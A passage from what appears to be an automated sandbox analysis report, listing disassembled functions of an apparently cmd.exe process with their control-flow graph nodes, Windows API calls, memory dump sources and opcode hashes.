                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97B1A430A042259ADB68EF64ED49BFEB3B4EF14310F148169E41AE71D1EB349F80CB51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001E310 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 551 1e310-1e341 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 552 1e343-1e355 551->552 553 1e357-1e370 _get_osfhandle GetConsoleMode 551->553 552->553 554 1e3bc-1e3d9 _get_osfhandle SetConsoleMode 552->554 555 1e372-1e37f 553->555 556 1e3bb 553->556 554->553 557 1e3df-2dc17 554->557 558 1e381-1e39a _get_osfhandle SetConsoleMode 555->558 559 1e3a0-1e3a9 555->559 557->553 563 2dc1d-2dc45 _get_osfhandle SetConsoleMode 557->563 558->559 561 1e3ab-1e3b8 559->561 562 1e3ba 559->562 561->562 562->556 563->553
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001E318
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.KERNELBASE(00000000), ref: 0001E322
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001E32F
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 0001E339
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001E35E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 0001E368
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001E390
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.KERNELBASE(00000000), ref: 0001E39A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001E3C7
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0001E3D1
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0002DC35
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0002DC3F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-3025314500
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 29d6a63d2d30584dab4fed7d28511bae7082513e00bee3257302df4282daeeec
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4a23a59b32b9b0efc041ffa4bb28223c4ffd9bcf3eaec2422d4d94ea6448b9f5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29d6a63d2d30584dab4fed7d28511bae7082513e00bee3257302df4282daeeec
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05219CB0B00B009BF7144B74ED1EB5B3A68AF82716F044628FA12C72E0D6BDD9448F56
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000159C0 Relevance: 15.3, APIs: 10, Instructions: 270COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 565 159c0-159e2 566 159f4-15a36 memset call 1e3f0 565->566 567 159e4-159ee call 20b12 565->567 573 29a3a-29a3d 566->573 574 15a3c-15a41 566->574 567->566 572 29a27-29a35 call 178e4 567->572 585 15a90-15a9e call 26b30 572->585 575 29a50 573->575 576 15a47-15a5b GetFullPathNameW 574->576 577 29a3f 574->577 580 29a52-29a53 575->580 581 15a61-15a66 576->581 582 29a4a GetLastError 576->582 577->582 586 29a54-29a5a call 178e4 580->586 583 29a60-29a6f call 178e4 581->583 584 15a6c-15a78 CreateDirectoryW 581->584 582->575 596 29a76-29a82 call 178e4 583->596 587 15aa1-15aac GetLastError 584->587 588 15a7a-15a84 584->588 586->583 595 15ab2-15ab5 587->595 587->596 592 15a86-15a8d ??_V@YAXPAX@Z 588->592 593 15a8e 588->593 592->593 593->585 595->580 600 15abb-15ac2 595->600 605 29a8a 596->605 602 15ac8-15acf 600->602 603 15b8b-15b8e 600->603 604 15ad5-15adf 602->604 602->605 603->586 606 29aa0-29aa4 604->606 607 15ae5-15ae9 604->607 608 29a95 605->608 609 29aa6 606->609 610 29aac-29aaf 606->610 607->608 611 15aef-15af2 607->611 608->606 609->610 610->603 612 29ab5-29ab9 610->612 613 15b35 611->613 615 29ac1-29ac5 612->615 616 29abb 612->616 614 15b3b-15b41 613->614 617 15b43-15b49 614->617 618 15b68-15b6a 614->618 615->603 619 29acb-29acf 615->619 616->615 620 15af4-15af6 617->620 621 15b4b-15b5c 617->621 622 15b83-15b89 618->622 623 15b6c-15b78 CreateDirectoryW 618->623 624 29ad1 619->624 625 29ad7-29ae8 619->625 630 15af7-15b01 620->630 621->617 628 15b5e-15b64 621->628 622->623 623->588 629 15b7e 623->629 624->625 626 29b17-29b1a 625->626 627 29aea-29af0 625->627 634 29b27-29b2d 626->634 635 29b1c-29b25 626->635 633 29af1-29af6 627->633 628->614 636 15b66 628->636 637 29b7c-29b87 GetLastError 629->637 631 29b71 630->631 632 15b07-15b11 CreateDirectoryW 630->632 631->637 639 15b20-15b32 632->639 640 15b13-15b1e GetLastError 632->640 641 29af8-29b0d 633->641 642 29b0f-29b15 633->642 634->618 643 29b33-29b37 634->643 635->634 636->630 637->588 638 29b8d 637->638 638->580 639->613 640->603 640->639 641->633 641->642 642->626 644 29b38-29b3d 643->644 645 29b56-29b61 644->645 646 29b3f-29b54 644->646 645->618 647 29b67-29b6a 645->647 646->644 646->645 647->631
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00015A10
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00015A53
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00015A70
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00015A87
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00020B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00020B40
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00015AA1
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00015B09
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00015B13
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00015B70
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00029B7C
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 402963468-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9f5143705d592322fac38aa1d2c92fb0f43687a4de722a0d7200d3ba2cda1a24
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 53a57b33257f3eb1d7020cc460d2a23a5bac9579661a4c3c1b4484d0e92f8263
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f5143705d592322fac38aa1d2c92fb0f43687a4de722a0d7200d3ba2cda1a24
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B91E231A00716DAEB74DB65EC85AFBB7F4EF89311F4440A9E50AEB180E7748D80C691
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00026903 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 648 26903-2691d call 271a8 651 2691f-2692e 648->651 652 26930-26932 651->652 653 26948-2694a 651->653 654 26934-26939 652->654 655 2693b-26946 Sleep 652->655 656 2694b-26951 653->656 654->656 655->651 657 26953-2695b _amsg_exit 656->657 658 2695d-26963 656->658 659 26997-2699d 657->659 660 26991 658->660 661 26965-2697e call 26a7c 658->661 663 269ba-269bc 659->663 664 2699f-269b0 _initterm 659->664 660->659 661->659 668 26980-2698c 661->668 666 269c7-269ce 663->666 667 269be-269c5 663->667 664->663 669 269f3-26a05 call 209b1 666->669 670 269d0-269dd call 27000 666->670 667->666 672 26a6c-26a7b 668->672 674 26a0a-26a19 669->674 670->669 678 269df-269f1 670->678 676 26a51-26a58 674->676 677 26a1b-26a35 exit _XcptFilter 674->677 679 26a65 676->679 680 26a5a-26a60 _cexit 676->680 678->669 679->672 680->679
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,0003CA98,0000000C), ref: 00026940
                                                                                                                                                                                                                                                                                                                                                                                                                          • _amsg_exit.MSVCRT ref: 00026955
                                                                                                                                                                                                                                                                                                                                                                                                                          • _initterm.MSVCRT ref: 000269A9
                                                                                                                                                                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 000269D5
                                                                                                                                                                                                                                                                                                                                                                                                                          • exit.MSVCRT ref: 00026A1C
                                                                                                                                                                                                                                                                                                                                                                                                                          • _XcptFilter.MSVCRT ref: 00026A2E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 796493780-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5418af9fc1829e67b5a3686acc48f9e4c6ede31d68c305c28d4baf2f42ff8623
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0e91fba292fb89d4ad2f2b2739665619c5765fb8cf7c761859defe017dd4171c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5418af9fc1829e67b5a3686acc48f9e4c6ede31d68c305c28d4baf2f42ff8623
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B311431604761CFFB229B54FC457A937A8EB04724F200629E206972E1DF3A5880CB81
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001E2AF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34threadlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 682 1e2af-1e2ba 683 1e2ca-1e2d2 682->683 684 1e2bc-1e2c9 SetThreadUILanguage 682->684 685 1e2d4-1e2ed GetModuleHandleW 683->685 686 1e2ef-1e2f1 683->686 685->686 688 1e307-1e309 685->688 686->688 689 1e2f3-1e301 GetProcAddress 686->689 688->684 690 1e30b-2dc0f SetThreadLocale 688->690 689->688
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetThreadUILanguage.KERNELBASE ref: 0001E2C6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,0001B952), ref: 0001E2D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(75550000,SetThreadUILanguage,00000000,0001B952), ref: 0001E2F9
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,0001B952), ref: 0002DC08
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Thread$AddressHandleLanguageLocaleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1264603166-2530943252
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4323f726641b487b63970cc9ba236342f5891714523673838f00adc5b64273b6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 51ee1135fde4448e9bccbb00e7821aa30d8f47094f131f0e4d8fcfaa705c68a4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4323f726641b487b63970cc9ba236342f5891714523673838f00adc5b64273b6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFF09071A046608BEB515B24FE4C6DE3694E706B32B150301FD15E72E0D7789CC1CA99
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001AD60 Relevance: 9.3, APIs: 6, Instructions: 328COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 692 1ad60-1adc0 GetConsoleTitleW 693 2cc60 692->693 694 1adc6-1add8 call 25a2e 692->694 696 2cc6a-2cc73 GetLastError 693->696 699 2cc3f 694->699 700 1adde-1adf1 call 1e3f0 694->700 698 2cc4d call 178e4 696->698 705 2cc52 698->705 704 2cc49-2cc4b 699->704 706 1adf7-1adff 700->706 707 2cc55-2cc5b call 261e6 700->707 704->698 705->707 708 1ae05-1ae1d call 1e950 706->708 709 1b0b9-1b0c3 call 20b12 706->709 707->693 715 1ae23-1ae26 708->715 716 1b118-1b11f call 221ee 708->716 709->704 717 1b0c9-1b0d6 call 17f47 709->717 715->707 718 1ae2c-1ae3e 715->718 733 1b126-1b12b call 22940 716->733 717->696 727 1b0dc-1b0f9 towupper 717->727 721 1ae44-1ae4c 718->721 722 2cc7c-2cc87 call 261e6 718->722 725 1ae52-1ae62 721->725 726 2cc8e 721->726 722->726 729 1ae68-1ae76 725->729 730 2cc99 725->730 726->730 731 1b100-1b109 727->731 735 2cca4 729->735 736 1ae7c-1ae8b call 1bc30 729->736 730->735 731->731 737 1b10b-1b112 731->737 741 1afc9-1b005 call 1b17b call 261e6 call 26b30 733->741 742 2ccaf 735->742 746 1ae91-1ae94 736->746 747 1b006-1b008 736->747 737->716 740 2cc75-2cc77 call 39a7d 737->740 740->722 749 2ccb7-2ccb9 742->749 751 1ae96-1aea3 call 1a800 746->751 752 1aea9-1aeab 746->752 747->746 750 1b00e-1b021 wcsncmp 747->750 756 1af2d-1af36 749->756 757 2ccbf-2ccc4 749->757 750->752 758 1b027 750->758 751->707 751->752 753 1af71-1af7a call 1b1b0 752->753 754 1aeb1-1aeb5 752->754 776 1af83-1af97 753->776 777 1af7c-1af7e call 1ad26 753->777 761 1af6b 754->761 762 1aebb-1aebd 754->762 765 1b130-1b135 756->765 766 1af3c-1af3e 756->766 757->756 758->746 761->753 770 1aec0-1aec9 762->770 765->766 769 1b13b-1b145 call 20b12 765->769 767 1af44-1af49 766->767 768 1b16c-1b170 766->768 773 1af50-1af59 767->773 768->767 779 1b176-2ccd6 768->779 790 1b147-1b14e 769->790 791 1b198-1b19c 769->791 770->770 775 1aecb-1aedd wcschr 770->775 773->773 780 1af5b-1af65 773->780 782 1b033-1b043 775->782 783 1aee3-1aee8 775->783 785 1afc4 call 1aa50 776->785 786 1af99-1af9f 776->786 777->776 795 2ccdb-2ccea call 178e4 779->795 780->754 780->761 788 1b046-1b04f 782->788 783->749 792 1aeee-1aef4 783->792 785->741 793 1afa5-1afab 786->793 794 1b02c-1b031 call 1c6c0 786->794 788->788 796 1b051-1b05b 788->796 797 1b160-1b167 790->797 798 1b150-1b15a call 17f47 790->798 791->795 792->749 799 1aefa-1af03 792->799 800 1afb1-1afb7 793->800 801 1b098-1b09d call 19dc0 793->801 794->741 795->705 804 1b077-1b07f 796->804 805 1b05d 796->805 797->766 798->797 824 2ccc9-2ccd2 GetLastError 798->824 807 1af05-1af0a 799->807 809 1b0a2-1b0a8 800->809 810 1afbd-1afc2 call 19770 800->810 801->741 814 1b193 call 26c78 804->814 815 1b085-1b08e 804->815 813 1b060-1b067 805->813 817 1af20-1af22 807->817 818 1af0c-1af13 807->818 809->733 820 1b0aa-1b0b2 call 159a0 809->820 810->741 822 1b072-1b075 813->822 823 1b069-1b071 813->823 814->791 815->801 817->742 826 1af28-1af2a 817->826 818->817 825 1af15-1af1e 818->825 830 1b0b4 820->830 822->804 822->813 823->822 824->795 825->807 825->817 826->756 830->741
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(?,00000104,25170B64,00000001,?), ref: 0001ADB6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00025A2E: memset.MSVCRT ref: 00025A5A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 0001B0E3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: memset.MSVCRT ref: 0001E9A0
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: wcschr.MSVCRT ref: 0001E9FC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: wcschr.MSVCRT ref: 0001EA14
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: _wcsicmp.MSVCRT ref: 0001EA80
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0001AED2
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 0001B016
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 0002CC6C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0002CCCB
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4198873954-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3dff6d51f4febcbc35b0916dcf7405fb29be9fb1a899ff103b128774ddc62d03
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: abcd53c95ce041fe25ea9751c688d8bdb41001ba52cb14cc66958ca5d52d6835
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dff6d51f4febcbc35b0916dcf7405fb29be9fb1a899ff103b128774ddc62d03
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EB13571B002258BDB74AB68DC95BFE73E0AF45300F140179E90A97292EB349DC6CB96
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00021F1A Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 861 21f1a-21f33 GetConsoleOutputCP GetCPInfo 862 2f185-2f194 GetThreadLocale 861->862 863 21f39-21f54 memset 861->863 866 2f196-2f1a0 862->866 867 2f1ae-2f1b2 862->867 864 2f1d7-2f1d8 863->864 865 21f5a 863->865 868 2f1dd-2f1e2 864->868 866->867 869 2f1b4-2f1b8 867->869 870 2f1c8 867->870 871 2f1e4-2f1ec 868->871 872 2f20b-2f20c 868->872 869->870 873 2f1ba 869->873 870->864 874 2f203-2f209 871->874 875 2f1ee-2f200 memset 871->875 873->870 874->868 874->872 875->874
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(00020A41), ref: 00021F1A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 00021F2B
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00021F45
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 0002F185
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002F1FB
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
